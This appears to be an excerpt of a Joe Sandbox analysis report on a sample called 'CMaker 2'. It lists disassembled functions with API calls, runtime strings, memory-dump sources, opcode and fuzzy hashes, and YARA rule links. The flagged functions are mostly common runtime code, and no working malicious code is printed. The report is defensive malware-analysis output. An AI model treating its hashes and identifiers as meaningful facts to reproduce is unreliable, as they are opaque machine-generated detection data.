                                                                                                                                                                                  • Opcode ID: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
                                                                                                                                                                                  • Instruction ID: efaa465d358882650ca771c3098c44f9e7ed01b9a861fa9c627e8a57399939ad
                                                                                                                                                                                  • Opcode Fuzzy Hash: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D7213031B1865186F774EBA6A934739A7A1FB84BC1F488038CE4D5BB54DF3CE5468600
                                                                                                                                                                                  Function 00007FF6FAC09450 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                  • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                  • Instruction ID: 30b1e2384388b32ce41d69414f1fe34d42d63a29e6c98b06329a7f5b3834ff8b
                                                                                                                                                                                  • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE11A7FEE1DA0305FF6411A4E45237914606F953B4F04EAF4E5BFC62E6FE6C69408184
                                                                                                                                                                                  Function 00007FF6FABFAF10 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF2F
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF4E
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF76
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF87
                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6FABFA167,?,?,00000000,00007FF6FABFA402,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFAF98
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                  • Opcode ID: d246c606bfef7ccb900317a1d308824ad35ed6390cb625aade358294dfc708cf
                                                                                                                                                                                  • Instruction ID: eebfa1da67c628ff2dbbc79db16d1fd281521e5a075649c616267af76763e2ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: d246c606bfef7ccb900317a1d308824ad35ed6390cb625aade358294dfc708cf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18117C68F2D28301FB5C93A5A69117962515F963F0F9C43BDE93ECA7D6FE2CB4018200
                                                                                                                                                                                  Function 00007FF6FABFADA4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                  • Opcode ID: d08938828d760f30092a1b3a417574d699fcdce62774d40d0c6dd9a0552b97ef
                                                                                                                                                                                  • Instruction ID: 870e34ba1ae097aedb5f21b96f9b65bd5dbd95824321eb94a07099094e26d61a
                                                                                                                                                                                  • Opcode Fuzzy Hash: d08938828d760f30092a1b3a417574d699fcdce62774d40d0c6dd9a0552b97ef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7211232CF2D24345FB6CA2B5585117912924F96330FAC5BBCE93EDA2D6FD2DB4018201
                                                                                                                                                                                  Function 00007FF6FABF5DC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                  • Opcode ID: db001d0b7e8f7bba3f17a0e80451e4d7df515b3a5593d2b47e06f42f007c2e84
                                                                                                                                                                                  • Instruction ID: 9b1b1889ba5670809d1cce37adb5c031fa8faa068cd81f3b7046d8fd4b35669b
                                                                                                                                                                                  • Opcode Fuzzy Hash: db001d0b7e8f7bba3f17a0e80451e4d7df515b3a5593d2b47e06f42f007c2e84
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED91C03AA0C68681F7258EA5D45037D3799AB42B94FDC42BADA6E873D5FF3CE4458300
                                                                                                                                                                                  Function 00007FFD935CF1F0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 223COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B22408
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                  • API String ID: 4199793457-2527649602
                                                                                                                                                                                  • Opcode ID: f54646abca4c87bb87db76196bf7c4bfa1316bed019ce2a666698ad422716a2b
                                                                                                                                                                                  • Instruction ID: 598ee766301ff735114053779605aa615c30203ba6e9ac34f07e92e585e1e1da
                                                                                                                                                                                  • Opcode Fuzzy Hash: f54646abca4c87bb87db76196bf7c4bfa1316bed019ce2a666698ad422716a2b
                                                                                                                                                                                  • Instruction Fuzzy Hash: D2B16125B0868292F7A5EBE5D4B47FC2769FB84B88F444035DA1DAB696DF3CE540C310
                                                                                                                                                                                  Function 00007FF6FABFFAC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                  • Opcode ID: 150c0761ae2a60fcacf4f563602d34e283ae5762a11513620c4a6975bd049ac1
                                                                                                                                                                                  • Instruction ID: f3ca24ff7aad6f98c5c35a9f999bbbd2f660472456597411fd476942cb77a688
                                                                                                                                                                                  • Opcode Fuzzy Hash: 150c0761ae2a60fcacf4f563602d34e283ae5762a11513620c4a6975bd049ac1
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB81A27AE0821285F7748EB981502782AA0EB12B45FDD80B9CE39D76D5FF2DE801D321
                                                                                                                                                                                  Function 00007FFD9DFC3180 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007A4331310
                                                                                                                                                                                  • String ID: H$join() result is too long for a Python string$sequence item %zd: expected str instance, %.80s found
                                                                                                                                                                                  • API String ID: 1168637666-3662399304
                                                                                                                                                                                  • Opcode ID: 63f11e17ca910a41eeeed5e16743e3acbc3563c55f803841b7e1b92467912e66
                                                                                                                                                                                  • Instruction ID: aa339fa85b342996319afa0e10e9e90b02e3f26688f24e73e5af81958088b72c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 63f11e17ca910a41eeeed5e16743e3acbc3563c55f803841b7e1b92467912e66
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F61B462B086D646EA349FA994263A967D0FB45BE4F154331CDAD873E4EF3CE859C300
                                                                                                                                                                                  Function 00007FFD935A2478 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 175COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007A4331170
                                                                                                                                                                                  • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                  • API String ID: 276401418-4157686371
                                                                                                                                                                                  • Opcode ID: 0cedab6f8ac1c18ad5184dddee5a93dc31ceb4d9cafa2f85838576479d26596f
                                                                                                                                                                                  • Instruction ID: 5f35116e2835be2e6dae6d464bdd03d7d1099027f32399a4c5cbae711b1179fc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cedab6f8ac1c18ad5184dddee5a93dc31ceb4d9cafa2f85838576479d26596f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99710566F0D69285FBB19BE1D4207BD67A9EF88784F444032EA4D67ADADF2CE540C700
                                                                                                                                                                                  Function 00007FFD93481FD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2263462576.00007FFD93481000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93480000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2263419318.00007FFD93480000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD934E2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD9352E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93531000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93536000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93593000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93595000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93598000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264210337.00007FFD93599000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264282200.00007FFD9359B000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd93480000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B2246570
                                                                                                                                                                                  • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                  • API String ID: 511975427-87138338
                                                                                                                                                                                  • Opcode ID: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                                                                                                                                                  • Instruction ID: 96e1f9abdef2a5115076c3c4a2bf543cd5883d1d0eab10922690b7b1477d3122
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8de3eb989cf6c62dcbce841305c01691443b1373284778389dc9e239678f53b6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E613832B1864247E6709A59A82067A72AAFF80B94F564235EF5DE36C5DF3CD401CB00
                                                                                                                                                                                  Function 00007FF6FABEBA78 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                  • Opcode ID: 2b651edb78efaeb316ac5de78849fde0daa8bdd7bfc86cfa6ef8cb3431ad488b
                                                                                                                                                                                  • Instruction ID: d388fac00e09ed8da45102f73db7d852f0bbb9fa859a76dfd6f254d19cc44fda
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b651edb78efaeb316ac5de78849fde0daa8bdd7bfc86cfa6ef8cb3431ad488b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E51C332B196028ADB14CF25E484A3937A2EB45B98F91C1B5DA6D877C8FF7DE841C700
                                                                                                                                                                                  Function 00007FF6FABED308 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                  • Opcode ID: fa0bcca0a4098b59133448382c677b9a55906fb86c6f234dcd4a21c8a5653ac7
                                                                                                                                                                                  • Instruction ID: 3cd6973b112f1b995034edcc07be01f3b6fa0540a872720f0753746501a5be93
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa0bcca0a4098b59133448382c677b9a55906fb86c6f234dcd4a21c8a5653ac7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F619632908BC586E7619F15E4803AAB7A0FB96B84F844265EBAC43795DF7CD194CB00
                                                                                                                                                                                  Function 00007FF6FABED6B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                  • Opcode ID: b11368fb803353e75de70a3c6cdb7d5ad95833e40dd5f9cce2c99e2783eb0f67
                                                                                                                                                                                  • Instruction ID: dc40e648c6c8cadd497d0596c525613277b9d698abaa67221561e8bfe024f982
                                                                                                                                                                                  • Opcode Fuzzy Hash: b11368fb803353e75de70a3c6cdb7d5ad95833e40dd5f9cce2c99e2783eb0f67
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4751A332A0838286EB748F2194843787BA0EB56B95F9441F5DAAC877C5DFBCE451C701
                                                                                                                                                                                  Function 00007FFD9DF9804C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2265214046.00007FFD9DF91000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFD9DF90000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2265008608.00007FFD9DF90000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB4000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2265214046.00007FFD9DFB9000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007A43319
